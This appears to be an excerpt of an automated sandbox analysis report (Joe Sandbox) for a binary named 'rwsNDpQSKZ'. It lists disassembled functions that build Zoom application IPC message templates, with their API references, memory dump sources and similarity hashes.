                • Instruction Fuzzy Hash: 0CE092F1A48A98ABD7206B889C56F2E7574AB94B69F500D38B1149A3D2CBF44D00C7B5
                Function 00C76400 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 25windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C76407
                • ??0?$CmmMessageTemplate_2@HV?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(com.Zoom.app.conf.pmc.teamchat.updated,000027AB,action,groupId,00000004), ref: 00C76427
                  • Part of subcall function 00C87690: __EH_prolog3.LIBCMT ref: 00C87697
                  • Part of subcall function 00C87690: ??0?$CmmMessageTemplate_1@H@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(?,?,?,00000004,00C875D2,?,?,?,?,00000004,00C874D5,?,?,?,?,?), ref: 00C876AA
                  • Part of subcall function 00C93584: __EH_prolog3_GS.LIBCMT ref: 00C9358B
                  • Part of subcall function 00C93584: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(0000004C,00C73B97,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,fontSize,jsonColor,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,00009EB8,fontSize,jsonColor,00000004), ref: 00C935B1
                  • Part of subcall function 00C93584: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,0000004C,00C73B97,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,fontSize,jsonColor,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,00009EB8,fontSize,jsonColor,00000004), ref: 00C935DF
                  • Part of subcall function 00C93584: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,0000004C,00C73B97,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,fontSize,jsonColor,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,00009EB8,fontSize,jsonColor,00000004), ref: 00C9361C
                  • Part of subcall function 00C93584: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,0000004C,00C73B97,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,fontSize,jsonColor,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,00009EB8,fontSize,jsonColor,00000004), ref: 00C9364C
                  • Part of subcall function 00C93584: EnterCriticalSection.KERNEL32(?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C73B97,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,fontSize,jsonColor,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify), ref: 00C936AA
                  • Part of subcall function 00C93584: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C73B97,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,fontSize,jsonColor), ref: 00C936C7
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@$ArchiveString$CriticalH_prolog3MessagePackageSectionTree@$Cmm@@@EnterH00@H_prolog3_LeaveNode@23@Root@Template_1@Template_2@Tree
                • String ID: action$com.Zoom.app.conf.pmc.teamchat.updated$groupId
                • API String ID: 2715420528-1050785931
                • Opcode ID: 7e326532767c353ad6d3d73d2c11ddf58607cc6750357366b76d25002951246b
                • Instruction ID: 037bdcb874b27be8d11660fc498e47bc15f9045c6f5151de5b12e521d46bd652
                • Opcode Fuzzy Hash: 7e326532767c353ad6d3d73d2c11ddf58607cc6750357366b76d25002951246b
                • Instruction Fuzzy Hash: 9BE092B1684B95AFD710AB459C9AB2E6164EB54B5AF40457CB1005A392CBF04D00CF71
                Function 00C6E430 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 25windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6E437
                • ??0?$CmmMessageTemplate_2@V?$CStringT@_W@Cmm@@H@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(com.zoom.app.assistant.control.system.devices.prepared.notify,00009D16,Json,StatusCode,00000004), ref: 00C6E457
                  • Part of subcall function 00C8B360: __EH_prolog3.LIBCMT ref: 00C8B367
                  • Part of subcall function 00C8B360: ??0?$CmmMessageTemplate_1@V?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(?,?,?,00000004,00C6BA5C,com.zoom.app.notify.recaptcha.confirm,00002762,user_input,cancel,00000004), ref: 00C8B37A
                  • Part of subcall function 00C8B40D: __EH_prolog3_GS.LIBCMT ref: 00C8B414
                  • Part of subcall function 00C8B40D: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(0000004C,00C6BA87,com.zoom.app.notify.recaptcha.confirm,user_input,cancel,com.zoom.app.notify.recaptcha.confirm,00002762,user_input,cancel,00000004), ref: 00C8B43A
                  • Part of subcall function 00C8B40D: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,0000004C,00C6BA87,com.zoom.app.notify.recaptcha.confirm,user_input,cancel,com.zoom.app.notify.recaptcha.confirm,00002762,user_input,cancel,00000004), ref: 00C8B468
                  • Part of subcall function 00C8B40D: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,0000004C,00C6BA87,com.zoom.app.notify.recaptcha.confirm,user_input,cancel,com.zoom.app.notify.recaptcha.confirm,00002762,user_input,cancel,00000004), ref: 00C8B4A5
                  • Part of subcall function 00C8B40D: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,0000004C,00C6BA87,com.zoom.app.notify.recaptcha.confirm,user_input,cancel,com.zoom.app.notify.recaptcha.confirm,00002762,user_input,cancel,00000004), ref: 00C8B4D5
                  • Part of subcall function 00C8B40D: EnterCriticalSection.KERNEL32(?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C6BA87,com.zoom.app.notify.recaptcha.confirm,user_input,cancel,com.zoom.app.notify.recaptcha.confirm), ref: 00C8B533
                  • Part of subcall function 00C8B40D: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C6BA87,com.zoom.app.notify.recaptcha.confirm,user_input,cancel), ref: 00C8B550
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$Archive$CriticalH_prolog3MessagePackageSectionTree@$Cmm@@@EnterH00@H_prolog3_LeaveNode@23@Root@Template_1@Template_2@Tree
                • String ID: Json$StatusCode$com.zoom.app.assistant.control.system.devices.prepared.notify
                • API String ID: 2703795933-3529884890
                • Opcode ID: 32345d0ec9d4fc7ee911a3981ab6912f478cea898d717006c0d34bd6b0300113
                • Instruction ID: d443dbc92bcf461cd7df952476c9427e3c4863b7f9f25b8fe05f27da34bc988f
                • Opcode Fuzzy Hash: 32345d0ec9d4fc7ee911a3981ab6912f478cea898d717006c0d34bd6b0300113
                • Instruction Fuzzy Hash: E6E022B5B40389BBE720BB55488AB2B2164EB42B59F20403DF1508E3E2CFF08C40CB38
                Function 00C765E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 25windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C765E7
                • ??0?$CmmMessageTemplate_2@HV?$CStringT@D@Cmm@@@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(com.zoom.ps.update_account_info,00013883,type,b64_user_profile,00000004), ref: 00C76607
                  • Part of subcall function 00C8AEE0: __EH_prolog3.LIBCMT ref: 00C8AEE7
                  • Part of subcall function 00C8AEE0: ??0?$CmmMessageTemplate_1@H@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(?,?,?,00000004,00C8AE42,?,?,?,?,00000004,00C6B83F,com.Zoom.app.notify.videolayout.download.status,00002775,status,message,data), ref: 00C8AEFA
                  • Part of subcall function 00C93584: __EH_prolog3_GS.LIBCMT ref: 00C9358B
                  • Part of subcall function 00C93584: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(0000004C,00C73B97,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,fontSize,jsonColor,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,00009EB8,fontSize,jsonColor,00000004), ref: 00C935B1
                  • Part of subcall function 00C93584: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,0000004C,00C73B97,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,fontSize,jsonColor,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,00009EB8,fontSize,jsonColor,00000004), ref: 00C935DF
                  • Part of subcall function 00C93584: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,0000004C,00C73B97,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,fontSize,jsonColor,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,00009EB8,fontSize,jsonColor,00000004), ref: 00C9361C
                  • Part of subcall function 00C93584: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,0000004C,00C73B97,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,fontSize,jsonColor,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,00009EB8,fontSize,jsonColor,00000004), ref: 00C9364C
                  • Part of subcall function 00C93584: EnterCriticalSection.KERNEL32(?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C73B97,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,fontSize,jsonColor,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify), ref: 00C936AA
                  • Part of subcall function 00C93584: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C73B97,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,fontSize,jsonColor), ref: 00C936C7
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@$ArchiveString$CriticalH_prolog3MessagePackageSectionTree@$Cmm@@@EnterH00@H_prolog3_LeaveNode@23@Root@Template_1@Template_2@Tree
                • String ID: b64_user_profile$com.zoom.ps.update_account_info$type
                • API String ID: 2715420528-924855614
                • Opcode ID: 21df0ef213f66a03504b0983c2df9c37b36b97a4822c1702fef3db6097027f54
                • Instruction ID: 8802e03c6622e87f801a0708d2cb73bdb73d79b2fe86c27071a8b64e3ac07d60
                • Opcode Fuzzy Hash: 21df0ef213f66a03504b0983c2df9c37b36b97a4822c1702fef3db6097027f54
                • Instruction Fuzzy Hash: A1E092F0A40784EBEB10AB45D847B6A66A4AB80B5AF50407CB1045B3D1CBF50E44D7B5
                Function 00C6C590 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 25windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6C597
                • ??0?$CmmMessageTemplate_2@IV?$CStringT@D@Cmm@@@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(com.Zoom.app.pt.notify.networkswitch,0000274B,NetworkState,AdapterName,00000004), ref: 00C6C5B7
                  • Part of subcall function 00C85B10: __EH_prolog3.LIBCMT ref: 00C85B17
                  • Part of subcall function 00C85B10: ??0?$CmmMessageTemplate_1@I@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(?,?,?,00000004,00C85A32,?,?,?,?,00000004,00C6833F,com.Zoom.app.conf.start,00002718,ProcessID,ProcessName,RecoveryCommand), ref: 00C85B2A
                  • Part of subcall function 00C5D6ED: __EH_prolog3_GS.LIBCMT ref: 00C5D6F4
                  • Part of subcall function 00C5D6ED: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID,com.zoom.app.mapi.outlookmapi.eventchange.notify,00009E66,NotifyType,EventID,00000004), ref: 00C5D71A
                  • Part of subcall function 00C5D6ED: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID,com.zoom.app.mapi.outlookmapi.eventchange.notify,00009E66,NotifyType,EventID,00000004), ref: 00C5D748
                  • Part of subcall function 00C5D6ED: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID,com.zoom.app.mapi.outlookmapi.eventchange.notify,00009E66,NotifyType,EventID,00000004), ref: 00C5D785
                  • Part of subcall function 00C5D6ED: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID,com.zoom.app.mapi.outlookmapi.eventchange.notify,00009E66,NotifyType,EventID,00000004), ref: 00C5D7B5
                  • Part of subcall function 00C5D6ED: EnterCriticalSection.KERNEL32(?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID,com.zoom.app.mapi.outlookmapi.eventchange.notify), ref: 00C5D813
                  • Part of subcall function 00C5D6ED: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C5C7F7,com.zoom.app.mapi.outlookmapi.eventchange.notify,NotifyType,EventID), ref: 00C5D830
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@$ArchiveString$CriticalH_prolog3MessagePackageSectionTree@$Cmm@@@EnterH00@H_prolog3_LeaveNode@23@Root@Template_1@Template_2@Tree
                • String ID: AdapterName$NetworkState$com.Zoom.app.pt.notify.networkswitch
                • API String ID: 2715420528-1947258441
                • Opcode ID: 97fe7c9321500db3bbc018861bc817895cc24bc7590bd6269bff6c61b40ef7df
                • Instruction ID: 2126a5d2a02b77e7a611f0d6efea68af4055762ab42eca471113e9f5a8f5fcbc
                • Opcode Fuzzy Hash: 97fe7c9321500db3bbc018861bc817895cc24bc7590bd6269bff6c61b40ef7df
                • Instruction Fuzzy Hash: A9E09270A403566BE7106B455C85F2F7264EF90B19F514429B1505E3D1CBF44D44D7BA
                Function 00C6E5B0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 25windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6E5B7
                • ??0?$CmmMessageTemplate_2@II@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(com.zoom.app.assistant.device.special.info.update.notification,00009CDF,DeviceType,SpecialInfo,00000004), ref: 00C6E5D7
                  • Part of subcall function 00C85120: __EH_prolog3.LIBCMT ref: 00C85127
                  • Part of subcall function 00C85120: ??0?$CmmMessageTemplate_1@I@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(?,?,?,00000004,00C67BBC,com.Zoom.app.mainboard.networkState,00004E29,State,Flag,00000004), ref: 00C8513A
                  • Part of subcall function 00C851CD: __EH_prolog3_GS.LIBCMT ref: 00C851D4
                  • Part of subcall function 00C851CD: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(0000004C,00C67BE7,com.Zoom.app.mainboard.networkState,State,Flag,com.Zoom.app.mainboard.networkState,00004E29,State,Flag,00000004), ref: 00C851FA
                  • Part of subcall function 00C851CD: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,0000004C,00C67BE7,com.Zoom.app.mainboard.networkState,State,Flag,com.Zoom.app.mainboard.networkState,00004E29,State,Flag,00000004), ref: 00C85228
                  • Part of subcall function 00C851CD: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,0000004C,00C67BE7,com.Zoom.app.mainboard.networkState,State,Flag,com.Zoom.app.mainboard.networkState,00004E29,State,Flag,00000004), ref: 00C85265
                  • Part of subcall function 00C851CD: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,0000004C,00C67BE7,com.Zoom.app.mainboard.networkState,State,Flag,com.Zoom.app.mainboard.networkState,00004E29,State,Flag,00000004), ref: 00C85295
                  • Part of subcall function 00C851CD: EnterCriticalSection.KERNEL32(?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C67BE7,com.Zoom.app.mainboard.networkState,State,Flag,com.Zoom.app.mainboard.networkState), ref: 00C852F3
                  • Part of subcall function 00C851CD: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C67BE7,com.Zoom.app.mainboard.networkState,State,Flag), ref: 00C85310
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@$Archive$CriticalH_prolog3MessagePackageSectionStringTree@$EnterH00@H_prolog3_LeaveNode@23@Root@Template_1@Template_2@Tree
                • String ID: DeviceType$SpecialInfo$com.zoom.app.assistant.device.special.info.update.notification
                • API String ID: 3124793654-1387586116
                • Opcode ID: dd37869de5a3ef07450072a9e2e3453cb200ca1839e43e8504072568ede025b8
                • Instruction ID: 867d5cdac96dfd160211a5f1ee26ce040f5dd51aa0d02b1343053f5c6b06e2e3
                • Opcode Fuzzy Hash: dd37869de5a3ef07450072a9e2e3453cb200ca1839e43e8504072568ede025b8
                • Instruction Fuzzy Hash: A8E0D8B0A40788BBDB217B48DC4AB2E66A4FB90B59F44446CB1006B3C1CBF44C04E7B9
                Function 00C70530 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 25windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C70537
                • ??0?$CmmMessageTemplate_2@V?$CStringT@D@Cmm@@H@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(com.zoom.app.assistant.sip.virtual.speaker.create.request,00009CF8,deviceName,deviceGUID,00000004), ref: 00C70557
                  • Part of subcall function 00C8CDD0: __EH_prolog3.LIBCMT ref: 00C8CDD7
                  • Part of subcall function 00C8CDD0: ??0?$CmmMessageTemplate_1@V?$CStringT@D@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(?,?,?,00000004,00C8CD32,?,?,?,?,00000004,00C8CC15,?,?,?,?,?), ref: 00C8CDEA
                  • Part of subcall function 00C8B40D: __EH_prolog3_GS.LIBCMT ref: 00C8B414
                  • Part of subcall function 00C8B40D: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(0000004C,00C6BA87,com.zoom.app.notify.recaptcha.confirm,user_input,cancel,com.zoom.app.notify.recaptcha.confirm,00002762,user_input,cancel,00000004), ref: 00C8B43A
                  • Part of subcall function 00C8B40D: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,0000004C,00C6BA87,com.zoom.app.notify.recaptcha.confirm,user_input,cancel,com.zoom.app.notify.recaptcha.confirm,00002762,user_input,cancel,00000004), ref: 00C8B468
                  • Part of subcall function 00C8B40D: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,0000004C,00C6BA87,com.zoom.app.notify.recaptcha.confirm,user_input,cancel,com.zoom.app.notify.recaptcha.confirm,00002762,user_input,cancel,00000004), ref: 00C8B4A5
                  • Part of subcall function 00C8B40D: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,0000004C,00C6BA87,com.zoom.app.notify.recaptcha.confirm,user_input,cancel,com.zoom.app.notify.recaptcha.confirm,00002762,user_input,cancel,00000004), ref: 00C8B4D5
                  • Part of subcall function 00C8B40D: EnterCriticalSection.KERNEL32(?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C6BA87,com.zoom.app.notify.recaptcha.confirm,user_input,cancel,com.zoom.app.notify.recaptcha.confirm), ref: 00C8B533
                  • Part of subcall function 00C8B40D: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,-00000004,?,?,-00000004,?,0000004C,00C6BA87,com.zoom.app.notify.recaptcha.confirm,user_input,cancel), ref: 00C8B550
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$Archive$CriticalH_prolog3MessagePackageSectionTree@$Cmm@@@EnterH00@H_prolog3_LeaveNode@23@Root@Template_1@Template_2@Tree
                • String ID: com.zoom.app.assistant.sip.virtual.speaker.create.request$deviceGUID$deviceName
                • API String ID: 2703795933-2223400988
                • Opcode ID: e8d43718c2c8fad2fc05b135c10f991f878c94cb0f24b34942326bf4bd5010d1
                • Instruction ID: 25033cf44797e5435a24a8cfa27c1711d39c66e07b689f561850bdbffdd75070
                • Opcode Fuzzy Hash: e8d43718c2c8fad2fc05b135c10f991f878c94cb0f24b34942326bf4bd5010d1
                • Instruction Fuzzy Hash: A2E092B1A80345ABD310BB409856B6E36A8EB94B1AF10802DF5105B7D2CBF54D84DB79
                Function 00C74530 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 25windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C74537
                • ??0?$CmmMessageTemplate_2@HV?$CStringT@D@Cmm@@@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(com.zoom.app.assistant.voice.command.action.request,00009D34,command,param,00000004), ref: 00C74557
                  • Part of subcall function 00C8AEE0: __EH_prolog3.LIBCMT ref: 00C8AEE7
                  • Part of subcall function 00C8AEE0: ??0?$CmmMessageTemplate_1@H@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(?,?,?,00000004,00C8AE42,?,?,?,?,00000004,00C6B83F,com.Zoom.app.notify.videolayout.download.status,00002775,status,message,data), ref: 00C8AEFA
                  • Part of subcall function 00C93584: __EH_prolog3_GS.LIBCMT ref: 00C9358B
                  • Part of subcall function 00C93584: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(0000004C,00C73B97,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,fontSize,jsonColor,com.zoom.app.cci.ccivideo.on.closed.caption.changed.notify,00009EB8,fontSize,jsonColor,00000004), ref: 00C935B1
